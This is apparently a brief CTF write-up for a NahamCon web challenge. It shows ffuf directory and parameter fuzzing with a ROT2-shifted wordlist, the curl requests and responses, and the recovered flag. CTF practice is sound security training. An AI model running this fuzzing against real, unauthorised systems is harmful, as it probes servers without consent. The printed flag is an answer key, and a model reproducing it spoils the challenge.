Logo
My Second CTF
Overview

My Second CTF

LZMK LZMK
May 25, 2025
1 min read
ctf/web ffuf

Solution

Terminal window
ffuf -w wordlist_rot2.txt -u http://challenge.nahamcon.com:31297/FUZZ/ -x http://127.0.0.1:8080 -s
fgdwi  [Status: 200, Size: 48, Words: 2, Lines: 1, Duration: 289ms]
Terminal window
curl -iL http://challenge.nahamcon.com:31297/fgdwi/
HTTP/1.1 200 OK
Server: nginx/1.26.3
Date: Sat, 24 May 2025 13:14:40 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.28


{"status":"error","message":"Missing parameter"}

Fuzz for parameters

Terminal window
ffuf -w wordlist_rot2.txt -u 'http://challenge.nahamcon.com:31297/fgdwi/?FUZZ=' -x http://127.0.0.1:8080 -fs 48


eqphkto [Status: 200, Size: 49, Words: 1, Lines: 1, Duration: 289ms]
Terminal window
curl -iL 'http://challenge.nahamcon.com:31297/fgdwi/?eqphkto='
HTTP/1.1 200 OK
Server: nginx/1.26.3
Date: Sat, 24 May 2025 13:18:06 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.28


{"flag":"flag{9078bae810c524673a331aeb58fb0ebc}"}